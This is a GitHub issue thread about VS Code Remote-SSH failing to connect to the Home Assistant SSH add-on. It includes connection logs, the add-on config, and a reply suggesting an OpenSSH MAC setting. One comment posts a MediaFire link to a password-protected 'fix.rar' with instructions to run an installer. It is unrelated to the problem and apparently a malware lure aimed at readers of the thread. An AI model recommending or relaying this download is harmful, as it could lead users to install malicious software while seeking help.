### ISSUE TITLE
Cant connect from Visual Studio

### ISSUE THREAD

**Issue by aloskam88** [hassio-addons/addon-ssh#778]
I need some help as I cannot work this out.. I am simply unable to connect from VisualStudio. But I can from Putty using a seperate putty ppk.

Getting the following output:

[15:25:55.713] Log Level: 2
[15:25:55.723] SSH Resolver called for "ssh-remote+7b22686f73744e616d65223a22486f6d65417373697374616e74227d", attempt 1
[15:25:55.724] "remote.SSH.useLocalServer": false
[15:25:55.724] "remote.SSH.useExecServer": true
[15:25:55.724] "remote.SSH.showLoginTerminal": false
[15:25:55.724] "remote.SSH.path": undefined
[15:25:55.724] "remote.SSH.configFile": undefined
[15:25:55.724] "remote.SSH.useFlock": true
[15:25:55.725] "remote.SSH.lockfilesInTmp": false
[15:25:55.725] "remote.SSH.localServerDownload": auto
[15:25:55.725] "remote.SSH.remoteServerListenOnSocket": false
[15:25:55.725] "remote.SSH.showLoginTerminal": false
[15:25:55.725] "remote.SSH.defaultExtensions": []
[15:25:55.725] "remote.SSH.loglevel": 2
[15:25:55.725] "remote.SSH.maxReconnectionAttempts": 3
[15:25:55.725] "remote.SSH.enableDynamicForwarding": true
[15:25:55.725] "remote.SSH.enableRemoteCommand": false
[15:25:55.725] "remote.SSH.serverPickPortsFromRange": {}
[15:25:55.725] "remote.SSH.serverInstallPath": {}
[15:25:55.725] "remote.SSH.permitPtyAllocation": false
[15:25:55.725] "remote.SSH.preferredLocalPortRange: undefined
[15:25:55.725] "remote.SSH.useCurlAndWgetConfigurationFiles: false
[15:25:55.731] VS Code version: 1.92.2
[15:25:55.731] Remote-SSH version: remote-ssh@0.113.1
[15:25:55.731] win32 x64
[15:25:55.732] SSH Resolver called for host: HomeAssistant
[15:25:55.732] Setting up SSH remote "HomeAssistant"
[15:25:55.735] Using commit id "fee1edb8d6d72a0ddff41e5f71a671c23ed924b9" and quality "stable" for server
[15:25:55.738] Install and start server if needed
[15:25:56.945] Checking ssh with "C:\WINDOWS\system32\ssh.exe -V"
[15:25:56.947] Got error from ssh: spawn C:\WINDOWS\system32\ssh.exe ENOENT
[15:25:56.948] Checking ssh with "C:\WINDOWS\ssh.exe -V"
[15:25:56.948] Got error from ssh: spawn C:\WINDOWS\ssh.exe ENOENT
[15:25:56.948] Checking ssh with "C:\WINDOWS\System32\Wbem\ssh.exe -V"
[15:25:56.949] Got error from ssh: spawn C:\WINDOWS\System32\Wbem\ssh.exe ENOENT
[15:25:56.949] Checking ssh with "C:\WINDOWS\System32\WindowsPowerShell\v1.0\ssh.exe -V"
[15:25:56.950] Got error from ssh: spawn C:\WINDOWS\System32\WindowsPowerShell\v1.0\ssh.exe ENOENT
[15:25:56.950] Checking ssh with "C:\WINDOWS\System32\OpenSSH\ssh.exe -V"
[15:25:56.969] > OpenSSH_for_Windows_8.6p1, LibreSSL 3.4
[15:25:56.969] > .3

[15:25:56.972] Running script with connection command: "C:\WINDOWS\System32\OpenSSH\ssh.exe" -T -D 62200 "HomeAssistant" bash
[15:25:56.974] Terminal shell path: C:\WINDOWS\System32\cmd.exe
[15:25:59.259] > ssh: connect to host 172.18.0.71 port 22: Connection refused
> The process tried to write to a nonexistent pipe.
> ]0;C:\WINDOWS\System32\cmd.exe
[15:25:59.259] Got some output, clearing connection timeout
[15:26:00.507] "install" terminal command done
[15:26:00.507] Install terminal quit with output: ]0;C:\WINDOWS\System32\cmd.exe
[15:26:00.507] Received install output: ]0;C:\WINDOWS\System32\cmd.exe
[15:26:00.508] Failed to parse remote port from server output
[15:26:00.509] Resolver error: Error: 
	at m.Create (c:\Users\Blue_\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:501230)
	at t.handleInstallOutput (c:\Users\Blue_\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:498552)
	at t.tryInstall (c:\Users\Blue_\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:623316)
	at async c:\Users\Blue_\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:582788
	at async t.withShowDetailsEvent (c:\Users\Blue_\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:586054)
	at async k (c:\Users\Blue_\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:579675)
	at async t.resolve (c:\Users\Blue_\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:583465)
	at async c:\Users\Blue_\.vscode\extensions\ms-vscode-remote.remote-ssh-0.113.1\out\extension.js:2:851126
[15:26:00.512] ------

My config is:

```
username: hassio
password: ""
authorized_keys:
  - >-
    ssh-ed25519
    fingerprint
    eddsa-key-20240827
  - >-
    ssh-ed25519
    fingerprint
    FakeUser@Orion
sftp: false
compatibility_mode: false
allow_agent_forwarding: false
allow_remote_port_forwarding: true
allow_tcp_forwarding: true
```

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by VlastiBroucek** [comment]
C:\WINDOWS\System32\OpenSSH\ssh.exe is probably using unsupported MACs by default. I had to add 
MACs hmac-sha2-512-etm@openssh.com
to my config.
